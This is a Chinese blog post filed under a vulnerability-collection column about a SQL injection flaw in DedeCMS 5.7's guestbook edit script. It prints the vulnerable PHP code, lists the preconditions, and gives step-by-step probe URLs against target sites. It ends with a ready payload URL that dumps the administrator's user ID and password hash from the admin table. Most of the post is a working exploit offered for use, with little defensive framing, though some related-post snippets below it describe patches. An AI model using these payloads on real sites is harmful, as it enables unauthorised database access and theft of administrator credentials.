dedecms5.7最新sql注射漏洞利用 guestbook.php

最新推荐文章于 2021-04-08 15:49:29 发布
最新推荐文章于 2021-04-08 15:49:29 发布
阅读量4.4k 收藏 1
点赞数 1
分类专栏: 漏洞收集

影响版本为5.7

漏洞文件edit.inc.php具体代码:

< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  

   

if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

else $GUEST_BOOK_POS = "guestbook.php";  

   

$id = intval($id);  

if(empty($job)) $job='view';  

   

if($job=='del' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  

ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);  

exit();  

}  

else if($job=='check' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  

ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);  

exit();  

}  

else if($job=='editok')  

{  

$remsg = trim($remsg);  

if($remsg!='')  

{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  

if($g_isadmin)  

{  

$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

//$remsg <br /><font color=red>管理员回复:</font> }  

else 

{  

$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  

$msg = $oldmsg.$remsg;  

}  

}  

//这里没有对$msg过滤,导致可以任意注入了By:Errorera home:www.errs.cc  

$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);  

exit();  

}  

//home:www.errs.cc  

if($g_isadmin)  

{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

}  

else 

{  

$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

}

漏洞成功需要条件:
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞:
先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言,
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
访问:

www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID

提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 

如果变成了 那么证明漏洞无法利用应为他开启了 php magic_quotes_gpc=off

如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问 

www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='

然后返回,那条留言ID的内容就直接修改成了mysql 的user().

大概利用就是这样,大家有兴趣的多研究下!!

最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!

view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='
7禧
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dedecms5.7漏洞利用
qq_48732306的博客
11-07 1224
Dedecms5.7渗透测试 Dedecms5.7由于编程的问题,有一个可以直接篡改用户密码的漏洞,一下是复现过程: 一:启动环境: 首先要进行dedecms的安装,其下载地址为:] DeDeCMS 官网 http://www.dedecms.com/ [2]。 不过要安装dedecms还要搭建好服务器,而我选择的是使用warmpserve来搭建的,这个软件包含了apache2,php与mysql数据库,安装了就可以一键运行服务器。 Dedecms的安装包含了两个文件,把uploads那个文件放在warms
guestbook.sql
09-10
SQL 运行文件,用于 Navical 创建表(message、trole、tuser)使用,创建表后右键选择“运行SQL文件”即可执行。
PHPCMS V9 模块开发 二次开发实例 留言本
XUZL8888的博客
07-19 372
鄙人实现了PHPCMS V9 产品开发权威指南(2011官方最新版).doc中的留言板实例,并加上模块安装和卸载功能, 程序可以运行,但只实现基本功能,目的是想让和我一样徘徊在PHPCMS门口不知道从哪儿进门的初学者走一下流程,欢迎指正! 对于像我这样的入门者希望先把上面这个文档仔细读一遍再往下看! 声明:我用的是GBK版本。 二次开发流程 创建数据库和数据库表(无数据库操...
dede /plus/guestbook.php,DEDE织梦CMS首页调用留言板代码
weixin_39732027的博客
04-08 311
有不少朋友会用到织梦的留言簿模块插件,想把留言本里面的一些内容在首页或其他页面上调用显示出来,具体调用方法和标签如下:***种方法:用feedback标签直接调用。代码如下:{dede:feedbackrow='10'titlelen='30'infolen='60'}[field:useamefunction="(@me=='guest'?'游客':@me)"/]评论[fie...
织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞)
weixin_39796238的博客
03-12 379
这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用):任意文件上传漏洞修复一、/include/dialog/select_soft_post.php文件,搜索(大概在72行左右)$fullfilename = $cfg_basedir.$activepath.'/'.$filename;修改为if (preg_match('#\.(...
织梦guestbook.php漏洞,织梦dedecms漏洞大全 | 志博日记
weixin_42512249的博客
03-12 830
1.dedecms文件任意上传漏洞漏洞一文件位置:/dede/media_add.php找到64行$filename = $savePath."/".$filename;改成$filename = $savePath."/".$filename; if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA...
GuestBook_PHP_SQL.rar_GuestBook
09-24
GuestBook_PHP_SQL.rar_GuestBook】这个压缩包文件似乎包含了一个基于PHPSQL构建的GuestBook(留言簿)系统。 GuestBook是互联网上一种常见的交互功能,允许访客在网站上留下他们的评论、建议或者反馈,从而促进...
Ex-guestbook.rar_Ex-guestbook.rar_GuestBook
09-14
PHP脚本(如guestbook.php)会处理这些数据,进行验证(如防止SQL注入)并保存到数据库。 3. 数据展示:另一个PHP脚本(可能为index.php)负责从数据库中获取已存储的留言,并将其显示在页面上。这通常通过查询语句...
wLHK-Dedecms漏洞整理.pdf
09-20
此外,Dedecms 5.7 plus/guestbook.php 注入漏洞也存在于留言板中,攻击者可以通过构造特殊的输入来 inject恶意SQL语句,从而获取或修改数据库中的数据。 在Dedecms 5.7 plus/guestbook.php中,攻击者可以通过修改...
php+mysql+毕业设计源代码】Bunuo Guestbook guestbook.rar
最新发布
01-10
资源内容:项目全套源码+完整文档 源码说明: 全部项目源码都是经过测试校正后百分百...数据库:MySql(建议用 5.7,8.0 有时候会有坑) 部署环境:Tomcat(建议用 7.x 或者 8.x b版本),maven Spring root vue.js
dedecms安全漏洞之/plus/guestbook/edit.inc.php如何解决?
qq_31763129的博客
08-18 3674
找到如下代码 $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' "); 替换成 $msg = addslashes($msg); $dsql-&gt;ExecuteNoneQuery("UPDATE `dede_guest...
织梦guestbook.php漏洞,织梦DEDECMS任意文件上传漏洞与注入漏洞修复方法
weixin_29686935的博客
03-12 712
修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个文件/include/dialog/select_soft_post.phpSQL注入漏洞包含5个文件/include/filter.inc.php /member/mtypes.php /member/pm.php /plus/guestbook/edit.inc.php /plus/search.php。修复方法都是...
DedeCms v5.7 SQL注入漏洞
网站守护中心
04-13 5375
描述:DedeCms v5.7 SQL注入漏洞WASC Threat Classification 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:dedecms v5.7的/member/ajax_membergroup.php脚本对用户提交给“membergroup”参数的数据在用于SQL查询前缺少过滤,
dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php
weixin_33840661的博客
05-22 590
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 注射漏洞成功需要条件如下 1. php magic_quotes_gpc=off 2. 漏洞文件存在: plus/guestbook.php 3. 在数据库中: dede_guestbook也需要存在 Releva...
织梦(dedecms) 5.7 /plus/car.php sql注入0day
weixin_33785108的博客
03-21 577
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! &lt;?php $host=$argv[1]; $path=$argv[2]; $path=$path."plus/car.php"; $url=$path; if(count($argv)&lt;3){ print_r(' Usage: php '.$argv...
Dedecms v5.7 plus\feedback.php SQL注入漏洞
weixin_30607029的博客
12-31 606
漏洞版本: dedecms 5.7 漏洞描述: DedeCms是免费的PHP网站内容管理系统。 Dedecms v5.7的plus\feedback.php SQL没有正确验证用户提供的输入,在实现上中存在注入漏洞,攻击者可利用此漏洞注入SQL代码。 <* 参考 http://huakai.paxmac.org/?p=508 *> 转载于:https:...
织梦留言板guestbook.htm加入头部导航
solocao的专栏
04-18 2246
织梦仿站的时候如果有留言板,通常都是不像织梦这样的留言板独立的页面;都是带头部导航的。那么如何在guestbook.htm加入头部导航;如果直接加入head.htm的话。标签在这里是无法调用的;我们必须使用函数来解决这个问题; 织梦里的留言板guestbook.htm用{dede:include filename=”../default/head.htm”/}不能自动生成导航列表,不能使用d
怎样用php做留言表,用PHP制作留言板-PHP教程,PHP应用
05-29
制作留言板需要使用PHP和MySQL数据库。以下是一个简单的留言板制作步骤: 1. 创建一个数据库和一张留言表。 使用MySQL客户端创建一个数据库和一张留言表。留言表包含字段id(自增主键)、username(留言者用户名)、content(留言内容)、create_time(留言时间)。 2. 创建一个留言板页面。 创建一个留言板页面(例如:guestbook.php),该页面包含一个表单和一个显示留言的区域。 3. 处理留言提交。 在guestbook.php页面中,通过PHP代码处理提交的留言。获取表单中的用户名和内容,并将其插入到留言表中。 4. 显示留言列表。 在guestbook.php页面中,通过PHP代码从留言表中查询留言列表,并将其显示在页面上。 5. 添加分页功能。 如果留言列表过长,可以添加分页功能。通过PHP代码从留言表中查询指定页码的留言列表,并将其显示在页面上。 以上是一个简单的留言板制作步骤,具体实现可以参考PHP教程和PHP应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值